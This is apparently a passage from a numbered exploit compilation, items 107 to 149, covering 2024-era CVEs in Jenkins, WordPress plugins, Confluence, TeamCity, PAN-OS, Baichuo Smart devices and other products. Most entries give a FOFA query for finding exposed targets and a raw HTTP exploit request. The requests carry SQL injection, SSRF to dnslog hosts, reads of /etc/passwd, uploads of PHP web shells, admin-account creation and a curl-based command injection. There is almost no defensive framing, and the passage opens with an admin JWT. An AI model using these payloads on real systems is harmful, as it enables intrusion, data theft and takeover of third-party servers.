Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform: SQL injection in /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection leading to code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan Engineering Quality Inspection System: arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "[email protected]", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway: SQL injection in index.php
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway: SQL injection in list_ipAddressPolicy.php
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform: SQL injection in down_file.php
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform: SQL injection in pwd_update.php
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform: SQL injection in editemedia.php
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform: SQL injection in get_extension_yl.php
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform: SQL injection in ajax_users.php
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform: weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4: path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard: remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
